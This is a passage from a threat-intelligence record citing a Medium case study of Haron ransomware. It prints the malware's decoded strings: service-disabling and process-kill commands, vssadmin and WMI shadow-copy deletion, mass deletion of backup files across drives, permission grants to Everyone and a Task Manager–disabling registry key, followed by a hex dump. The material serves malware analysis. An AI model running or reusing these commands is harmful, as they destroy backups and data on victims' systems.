disabled\r\nconfig SQLWriter start= disabled\r\nconfig SstpSvc start= disabled\r\n/IM mspub.exe /F\r\n/IM mydesktopqos.exe /F\r\n/IM mydesktopservice.exe /F\r\n/IM mysqld.exe /F\r\n/IM sqbcoreservice.exe /F\r\n/IM firefoxconfig.exe /F\r\n/IM agntsvc.exe /F\r\n/IM thebat.exe /F\r\n/IM steam.exe /F\r\n/IM encsvc.exe /F\r\n/IM excel.exe /F\r\n/IM CNTAoSMgr.exe /F\r\n/IM sqlwriter.exe /F\r\n/IM tbirdconfig.exe /F\r\n/IM dbeng50.exe /F\r\n/IM thebat64.exe /F\r\n/IM ocomm.exe /F\r\n/IM infopath.exe /F\r\n/IM mbamtray.exe /F\r\n/IM zoolz.exe /F\r\nIM thunderbird.exe /F\r\n/IM dbsnmp.exe /F\r\n/IM xfssvccon.exe /F\r\n/IM Ntrtscan.exe /F\r\n/IM isqlplussvc.exe /F\r\n/IM onenote.exe /F\r\n/IM PccNTMon.exe /F\r\n/IM msaccess.exe /F\r\n/IM outlook.exe /F\r\n/IM tmlisten.exe /F\r\n/IM msftesql.exe /F\r\n/IM powerpnt.exe /F\r\n/IM visio.exe /F\r\n/IM winword.exe /F\r\n/IM mysqld-nt.exe /F\r\n/IM wordpad.exe /F\r\n/IM mysqld-opt.exe /F\r\n/IM ocautoupds.exe /F\r\n/IM ocssd.exe /F\r\n/IM oracle.exe /F\r\n/IM sqlagent.exe /F\r\n/IM sqlbrowser.exe /F\r\n/IM sqlservr.exe /F\r\n/IM synctime.exe /F\r\nDelete Shadows /all /quiet\r\nresize shadowstorage /for=c: /on=c: /maxsize=401MB\r\nresize shadowstorage /for=c: /on=c: /maxsize=unbounded\r\nresize shadowstorage /for=d: /on=d: /maxsize=401MB\r\nresize shadowstorage /for=d: /on=d: /maxsize=unbounded\r\nresize shadowstorage /for=e: /on=e: /maxsize=401MB\r\nresize shadowstorage /for=e: /on=e: /maxsize=unbounded\r\nresize shadowstorage /for=f: /on=f: /maxsize=401MB\r\nresize shadowstorage /for=f: /on=f: /maxsize=unbounded\r\nresize shadowstorage /for=g: /on=g: /maxsize=401MB\r\nresize shadowstorage /for=g: /on=g: /maxsize=unbounded\r\nresize shadowstorage /for=h: /on=h: /maxsize=401MB\r\nresize shadowstorage /for=h: /on=h: /maxsize=unbounded\r\nGet-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); 
}\r\n/s /f /q c:\\*.VHD c:\\*.bac c:\\*.bak c:\\*.wbcat c:\\*.bkf c:\\Backup*.* c:\\backup*.* c:\\*.set c:\\*.win c\r\n/s /f /q d:\\*.VHD d:\\*.bac d:\\*.bak d:\\*.wbcat d:\\*.bkf d:\\Backup*.* d:\\backup*.* d:\\*.set d:\\*.win d\r\n/s /f /q e:\\*.VHD e:\\*.bac e:\\*.bak e:\\*.wbcat e:\\*.bkf e:\\Backup*.* e:\\backup*.* e:\\*.set e:\\*.win e\r\n/s /f /q f:\\*.VHD f:\\*.bac f:\\*.bak f:\\*.wbcat f:\\*.bkf f:\\Backup*.* f:\\backup*.* f:\\*.set f:\\*.win f\r\n/s /f /q g:\\*.VHD g:\\*.bac g:\\*.bak g:\\*.wbcat g:\\*.bkf g:\\Backup*.* g:\\backup*.* g:\\*.set g:\\*.win g\r\n/s /f /q h:\\*.VHD h:\\*.bac h:\\*.bak h:\\*.wbcat h:\\*.bkf h:\\Backup*.* h:\\backup*.* h:\\*.set h:\\*.win h\r\n\"C:*\" /grant Everyone:F /T /C /Q\r\n\"D:*\" /grant Everyone:F /T /C /Q\r\n\"Z:*\" /grant Everyone:F /T /C /Q\r\nThanos\r\ncacls.exe\r\n /grant\r\n:F /T /C /Q\r\ntasklist\r\n/v /fo csv\r\n/f /pid\r\nQ1|\r\nSoftware\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\r\nDisableTaskMgr\r\nSource: https://medium.com/walmartglobaltech/decoding-smartassembly-strings-a-haron-ransomware-case-study-9d0c5af7080b\r\n\nThe resource data appears to have a header on it but it doesn’t appear to be related to a compression routine:\n00000000: 7b7a 7d03 bd7f 953e a1ca bbad b1f2 97b6 {z}....\u003e........\n00000010: a036 bff2 7555 9ab2 6cbd 35ff 3e27 d40a .6..uU..l.5.\u003e'..\n00000020: e3ff cd43 7ca8 bf19 aff2 a64c 2a5e fc57 ...C|......L*^.W\n00000030: 1815 4212 d2ae 4f60 1240 5751 cbce 126e ..B...O`.@WQ...n\n00000040: 4efc a196 b849 8762 917c 2c2c 4888 52da N....I.b.|,,H.R.\n00000050: 8792 6eaf 4bfd 0430 2263 a42f d943 eda9 ..n.K..0\"c./.C..\n00000060: e739 3f20 b807 426e 222a fcaa d8de 9fd9 .9? ..Bn\"*......",
	"extraction_quality": 1,
	"language": "DE",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://medium.com/walmartglobaltech/decoding-smartassembly-strings-a-haron-ransomware-case-study-9d0c5af7080b"
	],
	"report_names": [
		"decoding-smartassembly-strings-a-haron-ransomware-case-study-9d0c5af7080b"
	],
	"threat_actors": [],
	"ts_created_at": 1775434774,
	"ts_updated_at": 1775791235,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/842b8d5b0468450599b2758c03b080196b22d4fb.pdf",
		"text": "https://archive.orkl.eu/842b8d5b0468450599b2758c03b080196b22d4fb.txt",
		"img": "https://archive.orkl.eu/842b8d5b0468450599b2758c03b080196b22d4fb.jpg"
	}
}